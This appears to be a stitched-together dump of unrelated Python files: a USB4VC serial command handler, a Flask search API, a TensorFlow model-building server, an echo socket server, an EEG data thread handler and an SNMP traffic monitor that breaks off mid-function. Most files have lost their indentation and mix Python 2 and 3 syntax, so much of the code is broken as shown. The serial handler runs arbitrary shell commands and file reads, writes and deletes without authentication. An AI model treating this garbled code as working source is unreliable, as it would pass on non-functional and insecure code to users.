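    # cartesian product of the comma-separated alternatives in each group
    parts = []
    pos = 0
    for match in _GROUP.finditer(envstr):
        parts.append([envstr[pos:match.start()]])
        parts.append([alt.strip() for alt in match.group(1).split(",")])
        pos = match.end()
    parts.append([envstr[pos:]])
    return ["".join(combo) for combo in itertools.product(*parts)]

if __name__ == "__main__":
    # prints ['py37-lin', 'py37-win', 'py38-lin', 'py38-win']
    print(expand("py{37,38}-{lin,win}"))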
|
usb4vc_uart.py
|
import os
import sys
import time
import serial
import subprocess
import base64
import threading
import usb4vc_shared
# import usb4vc_usb_scan
# import usb4vc_ui
ser = None
try:
ser = serial.Serial('/dev/serial0', 115200)
except Exception as e:
print("SERIAL OPEN EXCEPTION:", e)
def uart_worker():
if ser is None:
return
while 1:
received = ser.readline().decode().replace('\r', '').replace('\n', '')
# print("I received:", received)
line_split = received.split(' ', maxsplit=2)
if len(line_split) < 2:
continue
magic = line_split[0]
cmd_type = line_split[1]
payload = line_split[-1]
if magic != 'U4':
continue
if cmd_type == "QUIT":
exit()
# read file
if cmd_type == 'RF':
file_path = line_split[-1].strip()
content = None
try:
with open(file_path, 'rb') as myfile:
content = myfile.read()
except Exception as e:
ser.write(f"U4 ERR {e}\n".encode('utf-8'))
continue
base64_bytes = base64.standard_b64encode(content)
base64_message = base64_bytes.decode('utf-8')
ser.write(f"U4 OK {base64_message}\n".encode('utf-8'))
# write file
if cmd_type == 'WF':
wf_args = payload.split(' ', maxsplit=2)
if len(wf_args) < 2:
ser.write("U4 ERR missing file content\n".encode('utf-8'))
continue
file_path = wf_args[0].strip()
base64_message = wf_args[1].strip()
try:
base64_bytes = base64.standard_b64decode(base64_message)
with open(file_path, 'wb') as myfile:
myfile.write(base64_bytes)
ser.write("U4 OK\n".encode('utf-8'))
except Exception as e:
ser.write(f"U4 ERR {e}\n".encode('utf-8'))
continue
# delete file
if cmd_type == 'DF':
file_path = line_split[-1].strip()
try:
os.remove(file_path)
except Exception as e:
ser.write(f"U4 ERR {e}\n".encode('utf-8'))
continue
ser.write("U4 OK\n".encode('utf-8'))
if cmd_type == 'SC':
try:
shell_result = subprocess.getoutput(payload).strip()
base64_bytes = base64.standard_b64encode(shell_result.encode('utf-8'))
base64_message = base64_bytes.decode('utf-8')
ser.write(f"U4 OK {base64_message}\n".encode('utf-8'))
except Exception as e:
ser.write(f"U4 ERR {e}\n".encode('utf-8'))
continue
if cmd_type == 'INFO':
try:
ser.write(f"U4 OK USB4VC RPi App v{usb4vc_shared.RPI_APP_VERSION_TUPLE[0]}.{usb4vc_shared.RPI_APP_VERSION_TUPLE[1]}.{usb4vc_shared.RPI_APP_VERSION_TUPLE[2]} dekuNukem 2022\n".encode('utf-8'))
except Exception as e:
ser.write(f"U4 ERR {e}\n".encode('utf-8'))
continue
uart_thread = threading.Thread(target=uart_worker, daemon=True)
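For context, a host-side counterpart to the "U4 <CMD> <payload>" line protocol handled by uart_worker above could look roughly like the sketch below. The port name, baud rate, timeout, and error handling here are assumptions for illustration and are not taken from the original file.

# host_side_demo.py -- illustrative sketch of a client for the U4 line protocol
import base64
import serial  # pyserial, the same dependency the worker uses

def read_remote_file(port_name, remote_path, timeout=5):
    """Ask the device to send back a file via the RF command."""
    with serial.Serial(port_name, 115200, timeout=timeout) as port:
        port.write("U4 RF {}\n".format(remote_path).encode('utf-8'))
        reply = port.readline().decode('utf-8').strip()
        parts = reply.split(' ', maxsplit=2)
        if len(parts) < 2 or parts[0] != 'U4' or parts[1] != 'OK':
            raise RuntimeError("remote error: {}".format(reply))
        return base64.standard_b64decode(parts[2] if len(parts) > 2 else "")

# e.g. read_remote_file('/dev/ttyUSB0', '/boot/config.txt')  # hypothetical port name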
|
views.py
|
from flask import request
from flask_cors import CORS, cross_origin
from datetime import datetime, timezone
from functools import wraps
import threading, json, time, uuid
from googletrans import Translator
from AuthModule.authhandler import authProvider
from SearchModule import app
from SearchModule.TextSearchModule import loadModel, refreshModel, freeModel, loaded_models
from SearchModule.Utilities import resourceConfig, getProductId, getAllProductIds
from SearchModule.StorageAccountHelper import StorageAccountHelper
from SearchModule.Logger import loggerInstance
from SearchModule.LuisProvider import getLuisPredictions, mergeLuisResults
import urllib.parse, re
translator = Translator()
specialChars = r'[^(0-9a-zA-Z )]+'
######## RUN THE API SERVER IN FLASK #############
def getUTCTime():
return datetime.now(timezone.utc)
def getLatency(startTime, endTime):
return (endTime-startTime).total_seconds()*1000
def getRequestId(req):
if req.method == 'POST':
data = json.loads(request.data.decode('utf-8'))
return data['requestId'] if 'requestId' in data else None
elif req.method == 'GET':
return request.args.get('requestId')
return None
def loggingProvider(requestIdRequired=True):
def loggingOuter(f):
@wraps(f)
def logger(*args, **kwargs):
startTime = getUTCTime()
res = None
try:
requestId = getRequestId(request)
except Exception as e:
exceptionMessage = "Failed to parse request to get requestId: {0}".format(str(e))
loggerInstance.logUnhandledException("ErrorRequestId", exceptionMessage)
return (exceptionMessage, 500)
requestId = requestId if requestId else (str(uuid.uuid4()) if not requestIdRequired else None)
if not requestId:
res = ("BadRequest: Missing parameter requestId", 400)
endTime = getUTCTime()
loggerInstance.logApiSummary("Null", str(request.url_rule), res[1], getLatency(startTime, endTime), startTime.strftime("%H:%M:%S.%f"), endTime.strftime("%H:%M:%S.%f"), res[0])
return res
else:
try:
res = f(*args, **kwargs)
except Exception as e:
res = (str(e), 500)
loggerInstance.logUnhandledException(requestId, str(e))
endTime = getUTCTime()
if res:
loggerInstance.logApiSummary(requestId, str(request.url_rule), res[1], getLatency(startTime, endTime), startTime.strftime("%H:%M:%S.%f"), endTime.strftime("%H:%M:%S.%f"), res[0])
return res
return logger
return loggingOuter
# App routes
cors = CORS(app)
app.config.from_object("AppConfig.ProductionConfig")
app.config['CORS_HEADERS'] = 'Content-Type'
@app.before_first_request
def activate_job():
if app.config['MODEL_SYNC_ENABLED']:
productIds = getAllProductIds(resourceConfig)
sah = StorageAccountHelper(loggerInstance)
loggerInstance.logInsights("Starting model sync for {0}".format(','.join(productIds)))
thread = threading.Thread(target=sah.watchModels, args=(productIds,))
thread.start()
while True:
modelDownloadPending = [sah.firstTime[productId] if productId in sah.firstTime else True for productId in productIds]
if any(modelDownloadPending):
time.sleep(2)
else:
break
loggerInstance.logInsights("Search service startup succeeded")
@app.route('/healthping')
@cross_origin()
def healthPing():
return ("I am alive!", 200)
@app.route('/queryDetectors', methods=["POST"])
@cross_origin()
@authProvider()
@loggingProvider(requestIdRequired=True)
def queryDetectorsMethod():
data = json.loads(request.data.decode('utf-8'))
requestId = data['requestId']
try:
txt_data = translator.translate(urllib.parse.unquote(data['text'])).text
except Exception as e:
if 'text' in data:
loggerInstance.logHandledException(requestId, Exception(f"Failed to translate the query -> {str(e)}. Querystring: {data['text']}"))
txt_data = urllib.parse.unquote(data['text'])
else:
return ("Parameter with name 'text' was not provided in the request", 400)
original_query = txt_data
if (len(original_query)>250):
return ("Query length exceeded the maximum limit of 250", 400)
txt_data = " ".join(txt_data.split()) # remove extra whitespaces
if (not txt_data) or len(txt_data)<2:
return ("Minimum query length is 2", 400)
productid = getProductId(data)
if not productid:
return (f'Resource not supported in search. Request data: {json.dumps(data)}', 404)
productid = productid[0]
try:
loadModel(productid)
except Exception as e:
loggerInstance.logHandledException(requestId, e)
return (json.dumps({"query_received": original_query, "query": txt_data, "data": data, "results": [], "exception": str(e)}), 404)
results = loaded_models[productid].queryDetectors(txt_data)
try:
results["luis_results"] = getLuisPredictions(txt_data, productid)
except Exception as e:
results["luis_results"] = []
results["luis_exception"] = f"LUISProviderError: {str(e)}"
results = mergeLuisResults(results)
logObject = results
logObject["productId"] = productid
logObject["modelId"] = loaded_models[productid].trainingId
res = json.dumps(logObject)
return (res, 200)
@app.route('/queryMultiple', methods=["POST"])
def queryMultipleMethod():
data = json.loads(request.data.decode('utf-8'))
requestId = data['requestId']
txts = data['texts']
if not txts:
return ("No texts provided for search", 400)
productid = getProductId(data)
if not productid:
return ('Resource data not available', 404)
productid = productid[0]
try:
loadModel(productid)
except Exception as e:
loggerInstance.logHandledException(requestId, e)
loggerInstance.logToFile(requestId, e)
return (json.dumps({"query": txts, "results": [], "exception": str(e)}), 404)
res = json.dumps([loaded_models[productid].queryDetectors(txt_data) for txt_data in txts])
return (res, 200)
@app.route('/queryUtterances', methods=["POST"])
@cross_origin()
@authProvider()
def queryUtterancesMethod():
data = json.loads(request.data.decode('utf-8'))
requestId = data['requestId']
txt_data = data['detector_description']
try:
existing_utterances = [str(x).lower() for x in json.loads(data['detector_utterances'])]
except json.decoder.JSONDecodeError:
existing_utterances = []
if not txt_data:
return ("No text provided for search", 400)
productid = getProductId(data)
if not productid:
return (f'Resource type product data not available. Request data: {json.dumps(data)}', 404)
results = {"query": txt_data, "results": []}
for product in productid:
try:
loadModel(product)
res = loaded_models[product].queryUtterances(txt_data, existing_utterances)
except Exception as e:
loggerInstance.logHandledException(requestId, e)
res = {"query": txt_data, "results": None, "exception": str(e)}
if res:
results["results"] += res["results"] if res["results"] else []
res = json.dumps(results)
return (res, 200)
@app.route('/freeModel')
@cross_origin()
@authProvider()
def freeModelMethod():
productid = str(request.args.get('productId'))
freeModel(productid)
return ('', 204)
@app.route('/refreshModel', methods=["GET"])
@cross_origin()
@authProvider()
@loggingProvider(requestIdRequired=True)
def refreshModelMethod():
productid = str(request.args.get('productId')).strip()
res = "{0} - {1}".format(productid, refreshModel(productid))
return (res, 200)
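A caller of the /queryDetectors route above might look roughly like the following sketch. The base URL and headers are assumptions for illustration; whatever credentials authProvider() enforces would also need to be supplied, and the extra fields must include whatever getProductId expects for the resource.

# client_demo.py -- illustrative sketch only
import uuid
import requests

def query_detectors(base_url, text, extra_fields=None, headers=None):
    # requestId is mandatory because the route uses loggingProvider(requestIdRequired=True)
    payload = {"requestId": str(uuid.uuid4()), "text": text}
    payload.update(extra_fields or {})
    resp = requests.post(base_url.rstrip("/") + "/queryDetectors",
                         json=payload, headers=headers or {})
    resp.raise_for_status()
    return resp.json()

# e.g. query_detectors("http://localhost:5000", "app keeps restarting", {...})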
|
app.py
|
import os
import yaml
import time
import requests
import queue
import errno
import threading
import multiprocessing as mp
from flask import Flask
from flask import request, jsonify
import tensorflow as tf
import tensorflow_datasets as tfds
CLSAPP = "app:18080"
running = True
MAX_CONCURRENT = 4
app = Flask(__name__)
q = queue.Queue(maxsize=10)
MODEL_TYPE_BASE = "base"
MODEL_TYPE_PRACTICAL = "practical"
MODEL_TYPE_TRIAL = "trial"
BINARY_CLASS = "binary"
MULTI_CLASS = "multi"
LABELS_FILE = "lables"
TRAINING_EPOCHS_DEFAULT = 10
IMAGE_SIZE = 224
class DeferredDelDict(dict):
_dels = None
def __enter__(self):
self._dels = set()
def __exit__(self, type, value, traceback):
for key in self._dels:
try:
dict.__delitem__(self, key)
except KeyError:
pass
self._dels = None
def __delitem__(self, key):
if key not in self:
raise KeyError(str(key))
dict.__delitem__(self, key) if self._dels is None else self._dels.add(key)
tasks = DeferredDelDict()
class ModelRequest:
def __init__(self, model_name, model_type, params):
self.model_name = model_name
self.model_type = model_type
self.params = params
def shutdown_server():
stop = request.environ.get("werkzeug.server.shutdown")
if stop is None:
raise RuntimeError("Not running with the Werkzeug Server")
print("Shutting down...")
stop()
@app.route("/shutdown", methods=["POST"])
def shutdown():
global running
running = False
remaining_requests = q.qsize()
building_requests = len(tasks)
shutdown_server()
return jsonify(
{
"remainingRequests": remaining_requests,
"buildingRequests": building_requests,
}
)
@app.route("/models", methods=["GET"])
def get_models():
remaining_requests = q.qsize()
building_requests = len(tasks)
return jsonify(
{
"remainingRequests": remaining_requests,
"buildingRequests": building_requests,
}
)
@app.route("/models/<model_name>", methods=["POST"])
def create_model(model_name):
if model_name == "":
return error_response(400, "Invalid model name")
params = request.get_json()
s, ok = check_necessary_params(params)
if not ok:
return error_response(400, s)
image_path = params.get("imagePath", "")
trial = params.get("trial", False)
if image_path != "" or trial:
if trial:
model_type = MODEL_TYPE_TRIAL
else:
model_type = MODEL_TYPE_PRACTICAL
else:
model_type = MODEL_TYPE_BASE
req = ModelRequest(model_name, model_type, params)
try:
q.put_nowait(req)
except queue.Full:
return error_response(500, "Server currently busy")
return jsonify(
{
"model": model_name,
"type": model_type,
}
)
def check_necessary_params(params):
model_path = params.get("modelPath", "")
if model_path == "":
return "Invalid path for model", False
cfg_file = params.get("configFile", "")
if cfg_file == "":
return "Invalid config file name", False
return "", True
def get_base_model(is_tl):
if is_tl:
return tf.keras.applications.MobileNetV2(
input_shape=(IMAGE_SIZE, IMAGE_SIZE, 3),
weights="imagenet",
            # exclude the fully connected classification layer so it can be trained separately
include_top=False,
)
else:
return tf.keras.applications.MobileNetV2(
weights="imagenet",
)
def create_base_model(model_name, params):
model = get_base_model(False)
model_path = params.get("modelPath")
if os.path.isdir(model_path):
print(f"Model path already exists: {model_path}")
return
model.save(model_path)
tmp_labels_file = f"{LABELS_FILE}.tmp"
labels_path = tf.keras.utils.get_file(
tmp_labels_file,
"https://storage.googleapis.com/download.tensorflow.org/data/ImageNetLabels.txt",
cache_subdir="",
cache_dir=model_path,
)
# https://gist.github.com/yrevar/942d3a0ac09ec9e5eb3a#gistcomment-2719675
    # drop the unnecessary first label (`background`)
with open(os.path.join(model_path, LABELS_FILE), "w") as ofp:
with open(os.path.join(model_path, tmp_labels_file)) as ifp:
labels = ifp.readlines()
os.remove(os.path.join(model_path, tmp_labels_file))
for label in labels[1:]:
ofp.write(f"{label}")
    # the signature identifies the exported function; use the default serving signature
input_name = (
f"{tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY}_{model.input_names[0]}"
)
output_name = "StatefulPartitionedCall"
desc = params.get("desc", "")
if desc == "":
desc = "Default base model"
cfg = {
"name": model_name,
"type": MODEL_TYPE_BASE,
"tags": [tf.saved_model.SERVING], # meta graph를 명시하며 "serving"을 사용
"classification": MULTI_CLASS,
"inputShape": list(model.input_shape[1:]), # ignore batch size
"inputOperationName": input_name,
"outputOperationName": output_name,
"labelsFile": LABELS_FILE,
"description": desc,
}
cfg_file = params.get("configFile")
with open(os.path.join(model_path, cfg_file), "w") as fp:
yaml.dump(cfg, fp)
response = requests.put(
f"http://{CLSAPP}/models/{model_name}", json={"modelPath": model_path}
)
print(
f"Operate {model_name}, {MODEL_TYPE_BASE}, {model_path}: ({response.status_code}) {response.text}"
)
def create_transfer_learned_model(model_name, params):
trial = params.get("trial", False)
epochs = params.get("epochs", TRAINING_EPOCHS_DEFAULT)
base_model = get_base_model(True)
if trial:
model_type = MODEL_TYPE_TRIAL
        model, classification, labels, result = trial_transfer_learned_model(
base_model, epochs
)
else:
model_type = MODEL_TYPE_PRACTICAL
image_path = params.get("imagePath", "")
        model, classification, labels, result = practical_transfer_learned_model(
base_model, image_path, epochs
)
model_path = params.get("modelPath")
if os.path.isdir(model_path):
print(f"Model path already exists: {model_path}")
return
model.save(model_path)
with open(os.path.join(model_path, LABELS_FILE), "w") as fp:
for label in labels:
fp.write(f"{label}\n")
    # the signature identifies the exported function; use the default serving signature
input_name = (
f"{tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY}_{model.input_names[0]}"
)
output_name = "StatefulPartitionedCall"
desc = params.get("desc")
cfg = {
"name": model_name,
"type": model_type,
"tags": [tf.saved_model.SERVING], # meta graph를 명시하며 "serving"을 사용
"classification": classification,
"inputShape": list(model.input_shape[1:]), # ignore batch size
"inputOperationName": input_name,
"outputOperationName": output_name,
"labelsFile": LABELS_FILE,
"description": desc,
"trainingResult": result, # 학습결과 저장
}
cfg_file = params.get("configFile")
with open(os.path.join(model_path, cfg_file), "w") as fp:
yaml.dump(cfg, fp)
response = requests.put(
f"http://{CLSAPP}/models/{model_name}", json={"modelPath": model_path}
)
print(
f"Operate {model_name}, {MODEL_TYPE_BASE}, {model_path}: ({response.status_code}) {response.text}"
)
def practical_transfer_learned_model(base_model, image_path, epochs):
dirs = []
for file in os.listdir(image_path):
path = os.path.join(image_path, file)
if os.path.isdir(path):
dirs.append(path)
label_mode = "binary" if len(dirs) == 2 else "categorical"
train_ds = tf.keras.preprocessing.image_dataset_from_directory(
image_path,
label_mode=label_mode,
validation_split=0.2,
subset="training",
seed=123,
image_size=(IMAGE_SIZE, IMAGE_SIZE),
)
validation_ds = tf.keras.preprocessing.image_dataset_from_directory(
image_path,
label_mode=label_mode,
validation_split=0.2,
subset="validation",
seed=123,
image_size=(IMAGE_SIZE, IMAGE_SIZE),
)
labels = train_ds.class_names
train = train_ds.map(normalize_image)
validation = validation_ds.map(normalize_image)
model, classification = build_and_compile_model(base_model, train, len(labels))
result = train_and_evaluate_model(model, train, validation, epochs)
return model, classification, labels, result
def trial_transfer_learned_model(base_model, epochs):
(raw_train, raw_validation), metadata = tfds.load(
"cats_vs_dogs",
split=["train[:30%]", "train[80%:]"],
with_info=True,
as_supervised=True,
)
labels = []
get_label_name = metadata.features["label"].int2str
for i in range(metadata.features["label"].num_classes):
labels.append(get_label_name(i))
train = raw_train.map(normalize_and_resize_image)
validation = raw_validation.map(normalize_and_resize_image)
train_batches = train.shuffle(1000).batch(32)
validation_batches = validation.shuffle(1000).batch(32)
model, classification = build_and_compile_model(
base_model,
train_batches,
len(labels),
)
result = train_and_evaluate_model(model, train_batches, validation_batches, epochs)
return model, classification, labels, result
def build_and_compile_model(
base_model, train_batches, nr_classes, lr=0.0001, metrics=["accuracy"]
):
for image_batch, label_batch in train_batches.take(1):
feature_batch = base_model(image_batch)
    # keep the weights of the CNN feature extractor frozen;
    # only the fully connected classification layer is trained
base_model.trainable = False
global_average_layer = tf.keras.layers.GlobalAveragePooling2D()
feature_batch_average = global_average_layer(feature_batch)
    # because the classification layer applies a sigmoid or softmax activation, from_logits must be
    # set to False for the loss to be learned correctly (internally the loss function works with logit values)
if nr_classes == 2:
classification = BINARY_CLASS
activation = "sigmoid"
units = 1
loss = tf.keras.losses.BinaryCrossentropy(from_logits=False)
else: # nr_classes > 2
classification = MULTI_CLASS
activation = "softmax"
units = nr_classes
loss = tf.keras.losses.CategoricalCrossentropy(from_logits=False)
    # add a classification layer sized for nr_classes
prediction_layer = tf.keras.layers.Dense(units, activation=activation)
prediction_batch = prediction_layer(feature_batch_average)
model = tf.keras.Sequential([base_model, global_average_layer, prediction_layer])
model.compile(
optimizer=tf.keras.optimizers.RMSprop(lr=lr),
loss=loss,
metrics=metrics,
)
return model, classification
def train_and_evaluate_model(model, train_batches, validation_batches, epochs):
loss0, acc0 = model.evaluate(validation_batches, steps=20)
history = model.fit(
train_batches, epochs=epochs, validation_data=validation_batches
)
loss = history.history["loss"]
acc = history.history["accuracy"]
val_loss = history.history["val_loss"]
val_acc = history.history["val_accuracy"]
result = {
"epochs": epochs,
"initLoss": loss0,
"initAccuracy": acc0,
"trainLoss": loss,
"trainAccuracy": acc,
"validationLoss": val_loss,
"validationAccuracy": val_acc,
}
return result
def normalize_image(image, label):
image = tf.cast(image, tf.float32)
image = (image / 127.5) - 1
return image, label
def normalize_and_resize_image(image, label):
image = tf.cast(image, tf.float32)
image = (image / 127.5) - 1
image = tf.image.resize(image, (IMAGE_SIZE, IMAGE_SIZE))
return image, label
def error_response(status, message):
response = jsonify(
{
"error": message,
}
)
response.status_code = status
return response
def overwatch_tasks(tasks, timeout=None):
with tasks:
for task in tasks:
try:
task.get(timeout)
except mp.TimeoutError:
continue
del tasks[task]
def management(nr_workers=MAX_CONCURRENT):
global tasks
with mp.Pool(processes=nr_workers) as pool:
while running:
overwatch_tasks(tasks, 1)
if len(tasks) >= MAX_CONCURRENT or q.empty():
time.sleep(1)
continue
while running and len(tasks) < MAX_CONCURRENT:
try:
req = q.get_nowait()
except queue.Empty:
break
if (
req.model_type == MODEL_TYPE_PRACTICAL
or req.model_type == MODEL_TYPE_TRIAL
):
task = pool.apply_async(
func=create_transfer_learned_model,
args=(
req.model_name,
req.params,
),
)
else:
task = pool.apply_async(
func=create_base_model,
args=(
req.model_name,
req.params,
),
)
tasks[task] = True
overwatch_tasks(tasks)
print("Exit manager")
if __name__ == "__main__":
manager = threading.Thread(target=management)
manager.start()
app.run(host="0.0.0.0", port="18090", debug=True, use_reloader=False)
manager.join()
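A request that passes check_necessary_params and enqueues a transfer-learning job could be submitted roughly as in the sketch below. The host, port, paths, and file names are illustrative assumptions, not values taken from the file.

# submit_model_demo.py -- illustrative sketch only
import requests

def request_trial_model(host="localhost", port=18090, name="cats-vs-dogs"):
    body = {
        "modelPath": "/models/{}".format(name),  # required by check_necessary_params
        "configFile": "model.yaml",              # required by check_necessary_params
        "trial": True,                           # use the bundled cats_vs_dogs dataset
        "epochs": 3,
        "desc": "demo transfer-learned model",
    }
    resp = requests.post("http://{}:{}/models/{}".format(host, port, name), json=body)
    resp.raise_for_status()
    return resp.json()  # {"model": ..., "type": "trial"}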
|
server.py
|
# The MIT License (MIT)
# Copyright (c) 2019 Shubhadeep Banerjee
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
import socket
import sys
import logging
from logging.handlers import RotatingFileHandler
import threading
# define global variables
# timeout to close an idle socket, 0 means no timeout (in seconds)
SOCKET_TIMEOUT = 0
LOGGER_SIZE = 1024 * 1000 # size of individual log file (in Bytes)
LOGGER_BACKUP_COUNT = 10 # no of log backups after the current log file is full
# setup the logger
logger = logging.getLogger('EchoServerLogger')
logger.setLevel(logging.INFO)
logger.propagate = False
hdlr = RotatingFileHandler(
    'server.log', maxBytes=LOGGER_SIZE, backupCount=LOGGER_BACKUP_COUNT)
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
def log(message):
"""global log method
"""
print(message)
logger.info(message)
class SocketServer:
HOST = ''
PORT = 0
s = None
def __init__(self, host, port):
self.HOST = host
self.PORT = port
def startServer(self):
"""starts the socket server
"""
log("Opening socket on {0}:{1}".format(self.HOST, self.PORT))
try:
s = socket.socket()
s.bind((self.HOST, self.PORT))
except socket.error as msg:
s = None
try:
s.listen(5)
log("Socket is listening on {0}:{1}, timeout {2} sec".format(
self.HOST, self.PORT, SOCKET_TIMEOUT))
except:
if s is not None:
s.close()
s = None
# if socket is not open, exit the program
if s is None:
log('Could not open socket')
sys.exit(1)
# otherwise run a while loop where we accept an incoming connection
# and hand it over to the socket handler
else:
while True:
try:
sock, addr = s.accept()
# create a handler and start the same
handler = SocketHandler(sock, addr)
handler.start()
except:
break
log('Program terminated, closing socket!')
s.close()
class SocketHandler:
def __init__(self, socket, addr):
self.socket = socket
# set the timeout if the timeout is set greater than '0'
if (SOCKET_TIMEOUT > 0):
self.socket.settimeout(SOCKET_TIMEOUT)
self.addr = addr
self.open = True
def start(self):
"""creates a thread and starts the handler
"""
t1 = threading.Thread(target=self.handle, args=[])
t1.daemon = True
t1.start()
def handle(self):
"""Handles a socket client
"""
        # keep reading from the socket while it is open
while self.open:
try:
# read bytes from socket
data = self.socket.recv(1024)
# convert the bytes to readable string
                # here we are using utf-8, but any character set can be used
dataStr = data.decode('utf-8')
except:
self.open = False
continue
if len(dataStr) > 0:
                # if we receive some data, we log it and echo it back
log('Data from {0} - {1}'.format(self.addr, dataStr))
# before sending the data we need to encode it back to bytes
self.socket.send(dataStr.encode())
elif len(data) == 0:
                # if the data stream is empty, it means the socket has been closed
self.socket.close()
log('Closed {0}'.format(self.addr))
if __name__ == '__main__':
    # 0.0.0.0 as the host IP means the server accepts socket connections from all IPs;
    # a specific IP can be used instead to whitelist clients
server = SocketServer('0.0.0.0', 6060)
server.startServer()
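A minimal client for exercising the echo server above might look like the sketch below; the host and port simply mirror the defaults used in __main__.

# echo_client_demo.py -- illustrative sketch only
import socket

def echo_once(message, host='127.0.0.1', port=6060):
    # open a connection, send one message, and return the echoed reply
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(message.encode('utf-8'))
        return sock.recv(1024).decode('utf-8')

if __name__ == '__main__':
    print(echo_once('hello echo server'))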
|
threadhandler.py
|
from time import sleep
import read_mindwave_mobile
from threading import Thread
class data:
Delta = []
Theta = []
LowAlpha = []
HighAlpha = []
LowBeta = []
HighBeta = []
LowGamma = []
MedGamma = []
AttentionLevel = []
MeditationLevel = []
def startallfunc():
    thread1 = Thread(target=read_mindwave_mobile.start_measure)
    thread2 = Thread(target=wait_until_have_enough_data)
    thread1.start()
    thread2.start()
def send_kill_code():
    read_mindwave_mobile.kill_signal = True
def wait_until_have_enough_data():
    while read_mindwave_mobile.kill_signal != True:
        # recompute the sample count on every pass; only copy data once the reader has produced samples
        i = len(read_mindwave_mobile.Delta) + len(read_mindwave_mobile.Theta) + len(read_mindwave_mobile.LowAlpha) + len(read_mindwave_mobile.HighAlpha) + len(read_mindwave_mobile.LowBeta)
        i += len(read_mindwave_mobile.HighBeta) + len(read_mindwave_mobile.MedGamma) + len(read_mindwave_mobile.AttentionLevel) + len(read_mindwave_mobile.MeditationLevel)
        if i < 9:
            sleep(0.1)
            continue
        data.Delta.append(read_mindwave_mobile.Delta[-1])
        data.Theta.append(read_mindwave_mobile.Theta[-1])
        data.LowAlpha.append(read_mindwave_mobile.LowAlpha[-1])
        data.HighAlpha.append(read_mindwave_mobile.HighAlpha[-1])
        data.LowBeta.append(read_mindwave_mobile.LowBeta[-1])
        data.HighBeta.append(read_mindwave_mobile.HighBeta[-1])
        data.LowGamma.append(read_mindwave_mobile.LowGamma[-1])
        data.MedGamma.append(read_mindwave_mobile.MedGamma[-1])
        data.AttentionLevel.append(read_mindwave_mobile.AttentionLevel[-1])
        data.MeditationLevel.append(read_mindwave_mobile.MeditationLevel[-1])
def clear_data():
data.Delta.clear()
data.Theta.clear()
data.LowAlpha.clear()
data.HighAlpha.clear()
data.LowBeta.clear()
data.HighBeta.clear()
data.LowGamma.clear()
data.MedGamma.clear()
data.AttentionLevel.clear()
data.MeditationLevel.clear()
# def analyse() :
|
interface_statistics_monitor.py
|
from common_tasks import Grab_device_interfaces_snmp, get_data, set_data_mysql, device_config_info_lookup, print_error
from SNMPPoll import SnmpPoll as snmppoll
from datetime import datetime
from int_down import process_down
from threading import Thread
from deprefer_automation import add_cost_workflow
import time
import sys
percentage_threashold = 10
interval = 5
minuets = 5
def match_db_to_device(device_interfaces, device_id):
"""
Author - Jonathan Steward
    Function - Take the list of interfaces, match each one to its database row, and link
    the database information with the local interface
Inputs -
device_interfaces - list - list of interfaceobjects from SNMP gets
device_id -
returns -
device_interfaces - list - list of interface objects from snmp gets with database info
"""
command = "SELECT * FROM `FYP Data`.interfaces where device_id = {}".format(device_id)
# data will be ID/device_id/name/description/ip_address/state/lastupdate/traffic_counter/speed
db_interfaces = get_data(command)
for i in range(len(device_interfaces)):
for db_int in db_interfaces:
if device_interfaces[i].value == db_int[2]:
name = str(device_interfaces[i].value)
oid_index = int(device_interfaces[i].oid_index)
device_interfaces[i] = {"name": name, "oid_index": oid_index}
device_interfaces[i]["db_id"] = db_int[0]
device_interfaces[i]["previous_update"] = db_int[6]
device_interfaces[i]["previous_counter"] = db_int[7]
device_interfaces[i]["speed"] = db_int[8]
break
return device_interfaces
def print_polling_traffic_stats(device_int):
"""
Author - Jonathan Steward
Function - print out traffic stats for the interval polling of the interface
Inputs -
device_int - object - combined database and snmp gathered information
returns - n/a
"""
print "previous counter {}".format(device_int["previous_counter"])
print "current_counter {}".format(device_int["current_counter"])
print "bits_out {}".format(device_int["bits_out"])
print "time_of poll {}".format(device_int["update_time"])
print "previous_update {}".format(device_int["previous_update"])
print "secounds since {}".format(device_int["seconds_since"])
print "bits_per_sec {}".format(device_int["bits_per_sec"])
print "speed {}".format(device_int["speed"])
print "util_percentage {}".format(device_int["util_percentage"])
print "util_percentage after round {}".format(device_int["util_percentage"])
def poll_traffic(device_interfaces, device_ip, community):
"""
Author - Jonathan Steward
Function - Polls Device for interface counter and then calls traffic automation for loops
Inputs -
device_interfaces - list - list of interface objects from snmp gets with database info
device_ip - string - ip address of host with high utilization
community - string - community string needed for SNMP
returns - n/a
"""
interfaces_traffic = snmppoll("WALK", ".1.3.6.1.2.1.31.1.1.1.10", device_ip, community)
time_now = datetime.now()
print "polled interface traffic on {}".format(device_ip)
if not interfaces_traffic:
print_error("no interface traffic stats reutrned!")
return
for int_traffic in interfaces_traffic:
for i in range(len(device_interfaces)):
if int(int_traffic.oid_index) != int(device_interfaces[i]["oid_index"]):
# Not a matched interface
continue
if device_interfaces[i]["speed"] == 0:
# Will always alarm no need for this
break
device_interfaces[i]["current_counter"] = int(int_traffic.value)
state, device_interfaces[i] = calculate_interface_util(device_interfaces[i], time_now)
if not state:
break
if device_interfaces[i]["util_percentage"] > 1:
print_polling_traffic_stats(device_interfaces[i])
print "threashold is {}% current usage is {}% on {} for {} device".format(
percentage_threashold,
device_interfaces[i]["util_percentage"],
device_interfaces[i]["name"],
device_ip)
update_interface_and_history(device_interfaces[i])
